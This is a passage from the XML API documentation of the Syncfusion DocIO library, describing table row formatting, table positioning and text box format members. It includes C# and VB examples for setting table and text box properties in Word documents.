            <returns>The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.OnChange(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Occurs on format change.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
            <param name="propKey">The <b>integer</b> that represents the property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.RemoveRowSprms">
            <summary>
            Removes the sprms specific to first row.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ImportContainer(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the container.
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ImportXmlProps(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Imports the XML properties.
            </summary>
            <param name="format">The format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.ImportMembers(Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            Imports the members.
            <exclude/>
            </summary>
            <param name="format">The <see cref="T:Syncfusion.DocIO.DLS.FormatBase"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.RemovePositioning">
            <summary>
            Removes the positioning.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.PropToFormat(System.Int32)">
            <summary>
            Props to format.
            </summary>
            <param name="propertyKey">The property key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdatePreferredWidthInfo(System.Int32)">
            <summary>
            Updates the preferred width info.
            </summary>
            <param name="key">The key.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateShadings">
            <summary>
            Updates the shadings.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateBorders">
            <summary>
            Updates the borders.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdatePaddings">
            <summary>
            Updates the paddings.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdatePositioning">
            <summary>
            Updates the positioning.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.UpdateCellSpacing">
            <summary>
            Updates the cell spacing.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.CheckDefPadding">
            <summary>
            Checks the default padding.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.PreferredWidth">
            <summary>
            Gets or sets the preferred width of the table.
            </summary>
            <value>The preferred width of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.GridBeforeWidth">
            <summary>
            Get grid before width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.GridAfterWidth">
            <summary>
            Get grid after width
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.GridBefore">
            <summary>
            Gets or sets Grid Before
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.GridAfter">
            <summary>
            Gets or sets GridAfter
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Hidden">
            <summary>
            Gets or sets Hidden property of the row
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.BackColor">
            <summary>
            Gets or sets background color for the table or table row.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> for the background of table or row.</value>
            <remarks>When the table has no background color, the background color of the first row will be applied to the entire table.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.ForeColor">
            <summary>
            Gets or sets foreground color for the table or table row.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TextureStyle">
            <summary>
            Gets or sets the texture style.
            </summary>
            <value>The texture style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Borders">
            <summary>
            Gets the borders for the table or table row. Read-only
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Borders"/> for the table or row. </value>
            <remarks>The borders specified for the first row in the table will be applied to the entire table when the table has no borders.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Paddings">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Paddings"/> for the table. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Paddings"/> instance that specifies the cell padding values for the entire table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.CellSpacing">
            <summary>
            Gets or sets spacing value between the cells in the table or table row.
            </summary>
            <value>The <b>float</b> that specifies the spacing value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.LeftIndent">
            <summary>
            Gets or sets the value for table left indent.
            </summary>
            <value>The <b>float</b> that specifies the left indent value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.IsAutoResized">
            <summary>
            Gets or sets the value indicating whether the table is auto resized based on contents.
            </summary>
            <value><b>True</b> if automatically resize to fit contents; otherwise <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.IsBreakAcrossPages">
            <summary>
            Gets or sets the value indicating whether the row can break across pages.
            </summary>
            <value><b>True</b> if the row can break across pages; otherwise, <b>false</b>.</value>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                WordDocument document = new WordDocument("Template.docx");
                WSection section = document.Sections[0];
                WTable table = section.Tables[0] as WTable;
                //Disable breaking across pages for all rows in the table.
                foreach (WTableRow row in table.Rows)
                    row.RowFormat.IsBreakAcrossPages = false;
                document.Save("Result.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                Dim document As New WordDocument("Template.docx")
                Dim section As WSection = document.Sections(0)
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Disable breaking across pages for all rows in the table.
                For Each row As WTableRow In table.Rows
                    row.RowFormat.IsBreakAcrossPages = False
                Next
                document.Save("Result.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.IsHeaderRow">
            <summary>
            Gets or sets whether the row is a table header.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Bidi">
            <summary>
            Gets or sets a value indicating whether the table is a right to left table. 
            </summary>
            <value><b>True</b> if the table is right to left table; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.HorizontalAlignment">
            <summary>
            Gets or sets horizontal alignment for the table. 
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.RowAlignment"/> member that specifies the horizontal alignment for table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Sprms">
            <summary>
            Gets RowFormat sprms.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.RowDescriptor">
            <summary>
            Gets the table row descriptor.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.IsRowDescriptorDefined">
            <summary>
            Gets a value indicating whether this instance is row descriptor defined.
            </summary>
            <value>
            <c>true</c> if this instance is row descriptor defined; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.HasInvalidSprms">
            <summary>
            Defines if table format contains invalid sprms.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.IsChangedFormat">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.OwnerRow">
            <summary>
            Gets the owner table.
            </summary>
            <value>The owner table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Height">
            <summary>
            Gets or sets the row height.
            </summary>
            <value>The height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.CancelOnChange">
            <summary>
            Gets a value indicating whether cancel on change event.
            </summary>
            <value><c>true</c> if cancel on change event; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.WrapTextAround">
            <summary>
            Gets or sets a value indicating whether to use Around text wrapping.
            </summary>
            <value><b>True</b> if wrap table around text; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.Positioning">
            <summary>
            Gets the positioning values of the table when the text wrapping type is around. Read-only.
            </summary>
            <value>The <see cref="!:Syncfusion.DocIO.DLS.TablePositioning"/> object that specifies the absolute position of the table.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.XmlProps">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.RowFormat.TablePositioning">
            <summary>
            Represents the functionalities to absolute position a table when it has text wrap type as around. 
            </summary>
            <example>
            <para>The following code example demonstrates how to set the absolute position to a table in the document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create an instance of WordDocument class (Empty Word Document)
                WordDocument document = new WordDocument();
                //Open an existing Word document into DocIO instance
                document.Open("Table.docx", FormatType.Docx);
                //Access the instance of the first section in the Word document
                WSection section = document.Sections[0];
                //Access the instance of the first table in the section
                WTable table = section.Tables[0] as WTable;
                //Specify the table positioning options
                table.TableFormat.Positioning.HorizPositionAbs = HorizontalPosition.Right;
                table.TableFormat.Positioning.HorizRelationTo = HorizontalRelation.Margin;
                table.TableFormat.Positioning.VertPositionAbs = VerticalPosition.Center;
                table.TableFormat.Positioning.VertRelationTo = VerticalRelation.Page;
                table.TableFormat.Positioning.DistanceFromBottom = 10;
                table.TableFormat.Positioning.DistanceFromLeft = 10;
                table.TableFormat.Positioning.DistanceFromRight = 10;
                table.TableFormat.Positioning.DistanceFromTop = 10;
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create an instance of WordDocument class (Empty Word Document)
                Dim document As New WordDocument()
                'Open an existing Word document into DocIO instance
                document.Open("Table.docx", FormatType.Docx)
                'Access the instance of the first section in the Word document
                Dim section As WSection = document.Sections(0)
                'Access the instance of the first table in the section
                Dim table As WTable = TryCast(section.Tables(0), WTable)
                'Specify the table positioning options
                table.TableFormat.Positioning.HorizPositionAbs = HorizontalPosition.Right
                table.TableFormat.Positioning.HorizRelationTo = HorizontalRelation.Margin
                table.TableFormat.Positioning.VertPositionAbs = VerticalPosition.Center
                table.TableFormat.Positioning.VertRelationTo = VerticalRelation.Page
                table.TableFormat.Positioning.DistanceFromBottom = 10
                table.TableFormat.Positioning.DistanceFromLeft = 10
                table.TableFormat.Positioning.DistanceFromRight = 10
                table.TableFormat.Positioning.DistanceFromTop = 10
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.m_ownerRowFormat">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.#ctor(Syncfusion.DocIO.DLS.RowFormat)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.RowFormat.TablePositioning"/> class.
            </summary>
            <param name="ownerRowFormat">The owner row format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            
            </summary>
            <param name="parent"></param>
            <param name="baseKey"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.GetPropertyValue(System.Int32)">
            <summary>
            Gets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.SetPropertyValue(System.Int32,System.Object)">
            <summary>
            Sets the property value.
            </summary>
            <param name="propertyKey">The property key.</param>
            <param name="value">The value.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.GetDefValue(System.Int32)">
            <summary>
            Returns the default values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>An object that specifies the default value.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.AllowOverlap">
            <summary>
            Gets or sets a value indicating whether allow table to overlap].
            </summary>
            <value><c>true</c> if allow table to overlap; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.HorizPositionAbs">
            <summary>
            Gets or sets the absolute horizontal position for the table.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.HorizontalPosition"/> member that specifies the position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.VertPositionAbs">
            <summary>
            Gets or sets the absolute vertical position for the table.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.VerticalPosition"/> member that specifies the position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.HorizPosition">
            <summary>
            Gets or sets the horizontal position for the table.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.VertPosition">
            <summary>
            Gets or sets the vertical position for the table.
            </summary>
            <value>The <b>float </b> that specifies the vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.HorizRelationTo">
            <summary>
            Gets or sets the horizontal relation of the table.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.VertRelationTo">
            <summary>
            Gets or sets the vertical relation of the table.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.DistanceFromTop">
            <summary>
            Gets or sets the distance between the table and the text above the table .
            </summary>
            <value>The <b>float </b> that specifies the distance from the top.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.DistanceFromBottom">
            <summary>
            Gets or sets the distance between the table and the text below the table.
            </summary>
            <value>The <b>float </b> that specifies the distance from the bottom.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.DistanceFromLeft">
            <summary>
            Gets or sets the distance between the table and the text to the left of table.
            </summary>
            <value>The <b>float </b> that specifies the distance from the left.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.RowFormat.TablePositioning.DistanceFromRight">
            <summary>
            Gets or sets the distance between the table and the text to the right of table.
            </summary>
            <value>The <b>float </b> that specifies the distance from the right.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.PreferredWidthInfo">
            <summary>
            Specifies the preferred width information
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PreferredWidthInfo.Close">
            <summary>
            Closes the item.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.PreferredWidthInfo.#ctor(Syncfusion.DocIO.DLS.FormatBase,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.PreferredWidthInfo"/> class.
            </summary>
            <param name="ownerFormat">The owner format.</param>
            <param name="key">The key.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PreferredWidthInfo.Width">
            <summary>
            Gets or sets Preferred width value
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.PreferredWidthInfo.WidthType">
            <summary>
            Gets or sets Preferred width type
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WTextBoxFormat">
            <summary>
            Represents the formatting options of the text box such as colors and lines, size, etc.
            </summary>
            <example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Append new textbox to the paragraph
                IWTextBox textbox = paragraph.AppendTextBox(150, 75);
                //Add new text to the textbox body
                IWParagraph textboxParagraph = textbox.TextBoxBody.AddParagraph();
                textboxParagraph.AppendText("Text inside text box");
                //Set fill color, line width, line dashing and line style for textbox
                textbox.TextBoxFormat.FillColor = Color.LightGreen;
                textbox.TextBoxFormat.LineWidth = 2;
                textbox.TextBoxFormat.LineDashing = LineDashing.Dash;
                textbox.TextBoxFormat.LineStyle = TextBoxLineStyle.Double;
                //Apply textbox text direction
                textbox.TextBoxFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.VerticalTopToBottom;
                //Set text wrapping style and type
                textbox.TextBoxFormat.TextWrappingStyle = TextWrappingStyle.InFrontOfText;
                textbox.TextBoxFormat.TextWrappingType = TextWrappingType.Right;
                //Set horizontal and vertical position
                textbox.TextBoxFormat.HorizontalPosition = 200;
                textbox.TextBoxFormat.VerticalPosition = 200;
                //Set horizontal and vertical origin
                textbox.TextBoxFormat.VerticalOrigin = VerticalOrigin.Margin;
                textbox.TextBoxFormat.HorizontalOrigin = HorizontalOrigin.Page;
                //Set top and bottom margin values
                textbox.TextBoxFormat.InternalMargin.Bottom = 5f;
                textbox.TextBoxFormat.InternalMargin.Top = 5f;
                //Set horizontal and vertical alignment
                textbox.TextBoxFormat.VerticalAlignment = ShapeVerticalAlignment.Bottom;
                textbox.TextBoxFormat.HorizontalAlignment = ShapeHorizontalAlignment.Center;            
                //Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language ="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append new textbox to the paragraph
                Dim textbox As IWTextBox = paragraph.AppendTextBox(150, 75)
                'Add new text to the textbox body
                Dim textboxParagraph As IWParagraph = textbox.TextBoxBody.AddParagraph()
                textboxParagraph.AppendText("Text inside text box")
                'Set fill color, line width, line dashing and line style for textbox
                textbox.TextBoxFormat.FillColor = Color.LightGreen
                textbox.TextBoxFormat.LineWidth = 2
                textbox.TextBoxFormat.LineDashing = LineDashing.Dash
                textbox.TextBoxFormat.LineStyle = TextBoxLineStyle.[Double]
                'Apply textbox text direction
                textbox.TextBoxFormat.TextDirection = Syncfusion.DocIO.DLS.TextDirection.VerticalTopToBottom
                'Set text wrapping style and type
                textbox.TextBoxFormat.TextWrappingStyle = TextWrappingStyle.InFrontOfText
                textbox.TextBoxFormat.TextWrappingType = TextWrappingType.Right
                'Set horizontal and vertical position
                textbox.TextBoxFormat.HorizontalPosition = 200
                textbox.TextBoxFormat.VerticalPosition = 200
                'Set horizontal and vertical origin
                textbox.TextBoxFormat.VerticalOrigin = VerticalOrigin.Margin
                textbox.TextBoxFormat.HorizontalOrigin = HorizontalOrigin.Page
                'Set top and bottom margin values
                textbox.TextBoxFormat.InternalMargin.Bottom = 5.0F
                textbox.TextBoxFormat.InternalMargin.Top = 5.0F
                'Set horizontal and vertical alignment
                textbox.TextBoxFormat.VerticalAlignment = ShapeVerticalAlignment.Bottom
                textbox.TextBoxFormat.HorizontalAlignment = ShapeHorizontalAlignment.Center
                'Save and close the Word document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextBoxFormat.DEF_LINE_WIDTH">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WTextBoxFormat.m_horizRelation">
            <summary>
            TextBoxFormat class members
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WTextBoxFormat"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.ClearFormatting">
            <summary>
            Clears the textbox format applied
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.GetDefValue(System.Int32)">
            <summary>
            Returns the default text box values.
            <exclude/>
            </summary>
            <param name="key">The <b>integer</b> that specifies the key.</param>
            <returns>Null (don't use keys ).</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.Clone">
            <summary>
            Creates a duplicate copy of the text box format object.
            </summary>
            <returns>The reference to the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
            <param name="nextOwner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.UpdateFillEffects(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.MsofbtSpContainer,Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Updates the fill effects.
            </summary>
            <param name="container">The container.</param>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.SetTextWrappingStyle(Syncfusion.DocIO.DLS.TextWrappingStyle)">
             <summary>
            Sets the TextWrappingStyle,specific for parsers.
             </summary>
             <param name="TextWrapStyle">TextWrapStyle</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.GetWidthRelativeToPercent(System.Boolean)">
            <summary>
            Get width relative to percent
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.GetHeightRelativeToPercent(System.Boolean)">
            <summary>
            Get height relative to percent
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WTextBoxFormat.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.IsWrappingBoundsAdded">
            <summary>
            Gets or sets a value indicate whether current wrapping bounds points added to the list or not.
            </summary>
            <value>
            <c>true</c> if this instance is wrapping bounds added; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WidthOrigin">
            <summary>
            Gets or sets the horizontal width origin value.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WidthOrigin"/> member that specifies the width origin value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HeightOrigin">
            <summary>
            Gets or sets the vertical height origin value.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HeightOrigin"/> member that specifies the height origin value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HorizontalOrigin">
            <summary>
            Gets or sets the horizontal origin of the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.HorizontalOrigin"/> member that specifies the horizontal origin value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.VerticalOrigin">
            <summary>
            Gets or sets the vertical origin of the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.VerticalOrigin"/> member that specifies the vertical origin value.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextWrappingStyle">
            <summary>
            Gets or sets the text Wrapping style of the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextWrappingStyle"/> member that specifies the text wrapping style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrapDistanceBottom">
            <summary>
            DistanceBottom	Returns or sets the distance (in points) between the document text and the bottom edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrapDistanceLeft">
            <summary>
            DistanceLeft	Returns or sets the distance (in points) between the document text and the left edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrapDistanceRight">
            <summary>
            DistanceRight	Returns or sets the distance (in points) between the document text and the right edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrapDistanceTop">
            <summary>
            DistanceTop	Returns or sets the distance (in points) between the document text and the top edge of the text-free area surrounding the specified shape. Read/write Single.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.FillColor">
            <summary>
            Gets or sets the fill color for the text box.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> that specifies the fill color.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.LineStyle">
            <summary>
            Gets or sets the line style for the text box.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.TextBoxLineStyle"/> member that specifies the line style.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.Width">
            <summary>
            Gets or sets the width(in points) of the text box.
            </summary>
            <value>The <b>float</b> that specifies the width.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.Height">
            <summary>
            Gets or sets the height(in points) of the text box.
            </summary>
            <value>The <b>float</b> that specifies the height.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.LineColor">
            <summary>
            Gets or sets the line color of the text box.
            </summary>
            <value>The <see cref="T:System.Drawing.Color"/> that specifies the line color.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.NoLine">
            <summary>
            Gets or sets a value indicating whether the textbox has no line around its shape.
            </summary>
            <value><b>True</b> if the textbox has no line; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.WrappingMode">
            <summary>
            Gets or sets textbox wrapping mode
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.HorizontalPosition">
            <summary>
            Gets or sets the horizontal position of the text box.
            </summary>
            <value>The <b>float</b> specifies the horizontal position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.IsBelowText">
            <summary>
            Gets or sets true/false value of IsBelowText property 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.VerticalPosition">
            <summary>
            Gets or sets the vertical position of the text box.
            </summary>
            <value>The <b>float</b> specifies the vertical position.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WTextBoxFormat.TextWrappingType">
            <summary>
            Gets or sets the text wrapping type for the text box.
            </summary>
